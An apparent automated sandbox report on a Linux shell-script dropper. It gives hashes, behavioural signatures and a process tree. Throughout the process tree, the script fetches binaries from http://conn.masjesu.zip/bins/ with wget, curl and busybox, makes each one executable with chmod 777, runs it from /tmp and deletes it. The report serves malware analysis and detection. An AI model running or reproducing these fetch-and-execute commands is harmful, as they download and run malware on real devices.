Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
-
Size
10KB
-
MD5
47e14a3295dfe930e05250b0f07d1ecb
-
SHA1
a9bd5853962549cda39520d99b1b5a559f03623e
-
SHA256
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048
-
SHA512
11264a8416d0e1690b6f118458e7aabf6c7e02764ffea9a1ef8f8aeaffd235d81cba95e368cd26ee7bc0e69033b2db65b0f4a9f72e0827b596d1532f4a7ab21d
-
SSDEEP
96:Y99UNLTZTxTkvUxpyLeBe5el6WLtt8cghrHGRB5bLWGXzpzBzSvTuueVjujejxwG:RNH9VkvBIxLgoHN9VkUX9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 832 chmod 848 chmod 903 chmod 919 chmod 966 chmod 871 chmod 887 chmod 935 chmod 950 chmod 958 chmod 779 chmod 840 chmod 856 chmod 895 chmod 927 chmod 942 chmod 796 chmod 863 chmod 879 chmod 911 chmod -
Executes dropped EXE 20 IoCs
ioc pid Process /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 780 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 798 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 833 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 841 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 849 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 857 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id 864 GtTyy46k97PMs25DsIOKewPL4B9poyk8id /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 872 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln 880 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N 888 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC 896 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N 904 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX 912 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq 920 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 928 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 936 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 943 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 951 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 959 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 967 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 60 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 773 busybox 957 busybox 902 busybox 932 curl 941 busybox 826 curl 853 curl 892 curl 891 wget 910 busybox 939 curl 730 curl 839 busybox 852 wget 962 wget 791 busybox 859 wget 915 wget 916 curl 836 wget 907 wget 938 wget 900 curl 924 curl 946 wget 844 wget 886 busybox 899 wget 875 wget 918 busybox 860 curl 894 busybox 884 curl 926 busybox 931 wget 719 wget 867 wget 870 busybox 845 curl 847 busybox 855 busybox 883 wget 955 curl 831 busybox 837 curl 868 curl 954 wget 876 curl 908 curl 947 curl 785 wget 789 curl 862 busybox 949 busybox 965 busybox 934 busybox 963 curl 803 wget 878 busybox 923 wget -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln curl File opened for modification /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N curl File opened for modification /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl File opened for modification /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 curl File opened for modification /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N curl File opened for modification /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id curl File opened for modification /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq curl File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl
Processes
-
/tmp/930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh/tmp/930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:773
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:831
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:839
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:843
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:844
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:847
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N./a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX./zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq./LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:969
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
